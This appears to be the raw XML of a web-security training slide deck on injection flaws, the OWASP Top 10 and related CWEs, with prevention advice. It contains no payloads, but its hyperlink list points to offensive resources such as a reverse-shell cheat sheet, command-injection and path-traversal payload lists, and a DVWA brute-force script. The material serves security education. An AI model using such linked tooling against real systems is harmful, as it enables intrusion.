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PT Sans Narrow"/>
      <p:regular r:id="rId90"/>
      <p:bold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PTSansNarrow-bold.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PTSansNarrow-regular.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40eb9492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40eb949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7463060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7463060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40eb9492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40eb9492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7463060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7463060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40eb9492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40eb949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74630602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74630602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40eb949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40eb949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74630602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74630602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b40eb9492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b40eb9492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4630602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74630602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40eb949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40eb949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40eb9492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40eb9492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74630602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74630602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40eb9492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40eb9492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74630602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74630602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b40eb949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40eb9492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7463060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7463060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6ea71992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6ea71992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40eb9492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40eb9492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7aaf4290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7aaf4290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79d89a9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79d89a9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40eb94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40eb94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7aaf4290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7aaf4290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40eb9492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40eb9492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7aaf4290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7aaf4290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79d89a9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79d89a9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7aaf429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b7aaf429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40eb9492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40eb9492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47cba7a3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b47cba7a3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7aaf4290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7aaf4290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79d89a9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79d89a9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7aaf429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7aaf429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736ea54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736ea54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40eb949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40eb949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40eb9492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40eb9492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79d89a9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79d89a9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7aaf429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7aaf429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40eb9492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40eb9492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7aaf429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b7aaf429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79d89a9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79d89a9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b7aaf4290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b7aaf429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40eb9492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40eb9492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79d89a95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b79d89a9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40eb949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40eb949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b79d89a9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b79d89a9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b7aaf4290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b7aaf4290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b40eb9492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b40eb9492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40eb9492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b40eb94925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b79d89a9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b79d89a9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b7aaf4290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b7aaf4290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b40eb9492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b40eb9492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b79d89a9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b79d89a9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b7aaf4290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b7aaf4290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40eb94925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40eb94925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40eb949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40eb949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b79d89a95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b79d89a95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b7aaf4290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b7aaf4290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b40eb9492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b40eb9492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7aaf4290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7aaf4290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b79d89a95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b79d89a95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b79d89a9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b79d89a9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b7aaf4290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b7aaf4290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b40eb94925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b40eb94925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7aaf4290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b7aaf4290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b40eb94925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b40eb9492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746306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746306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b79d89a95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b79d89a95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b79d89a95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b79d89a95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b7aaf4290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b7aaf4290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48d15e0a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48d15e0a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b79d89a95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b79d89a95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7aaf4290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b7aaf4290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b79d89a9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b79d89a9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b7aaf429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b7aaf429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b7aaf429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b7aaf429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b7aaf4290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b7aaf4290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40eb949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40eb949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b6ea719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b6ea719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b6ea71992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b6ea71992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b6ea71992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b6ea71992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b40eb9492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b40eb9492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b6ea7199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b6ea7199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74630602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74630602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owasp.org/Top10/A03_2021-Inje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wasp.org/Top10/A04_2021-Insecure_Desig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wasp.org/Top10/A05_2021-Security_Misconfigur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wasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Component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wasp.org/Top10/A07_2021-Identification_and_Authentication_Failur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owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failur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owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failur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owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%2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Burchonator/InStep/blob/main/week4-reports/README.m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acunetix.com/blog/articles/dom-xss-explain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OWASP/wstg/tree/master" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/" TargetMode="External"/><Relationship Id="rId5"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github.com/Burchonator/bruteforce-scripts/blob/master/dvwa-login-php.py" TargetMode="Externa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wasp.org/Top10/A01_2021-Broken_Access_Contro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1.png"/><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github.com/OWASP/wstg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/wstg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/wstg"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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/sseffa/11031135" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://n3t-hunt3r.gitbook.io/pentest-book/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.webappsec.org/projects/articles/071105.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.htmlspecialchars.php" TargetMode="External"/><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owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/all-topics" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content-security-policy.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/omurugur/Path_Travelsal_Payload_List/blob/master/Payload/Deep-Travelsal.txt" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/command-injection-payload-list" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digininja/DVWA" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hacksplaining.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctf.hacker101.com/ctf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bugbountyhunter.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wasp.org/Top10/A02_2021-Cryptographic_Failur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84825" y="1742725"/>
            <a:ext cx="81753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InStep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Week 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Presentation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 sz="5200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitchell Burcheri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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;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Injection attacks involve inputting code which performs unintended functionality such creating, viewing, modifying, or deleting data which the user wasn’t expected to do.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL, NoSQL, OS, and LDAP commands can lead to injection flaws if user input isn’t sanitised before the data is read by the interpreter as part of a command or query. Malicious user input tricks the interpreter into executing unintended commands or access data without the correct authorisation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132" name="Google Shape;132;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="1170125"/>
            <a:ext cx="4267200" cy="3271520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p22"/>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3</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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="44505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CWE-20 Improper Input Validation</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-75 Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-83 Improper Neutralization of Script in Attributes in a Web Page</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-87 Improper Neutralization of Alternate XSS Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-90 Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-91 XML Injection (aka Blind XPath Injection)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-94 Improper Control of Generation of Code ('Code Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-96 Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-97 Improper Neutralization of Server-Side Includes (SSI) Within a Web Page</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-99 Improper Control of Resource Identifiers ('Resource Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-100 Deprecated: Was catch-all for input validation issues</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-116 Improper Encoding or Escaping of Output</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-138 Improper Neutralization of Special Elements</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-184 Incomplete List of Disallowed Inputs</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-470 Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-471 Modification of Assumed-Immutable Data (MAID)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-564 SQL Injection: Hibernate</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-610 Externally Controlled Reference to a Resource in Another Sphere</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-643 Improper Neutralization of Data within XPath Expressions ('XPath Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-644 Improper Neutralization of HTTP Headers for Scripting Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-652 Improper Neutralization of Data within XQuery Expressions ('XQuery Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p23"/>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Classify data processed, stored, or transmitted by an application. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Don't store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Make sure to encrypt all sensitive data at rest.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Encrypt all data in transit with secure protocols such as TLS with forward secrecy (FS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport Security (HSTS).</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Disable caching for response that contain sensitive data.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
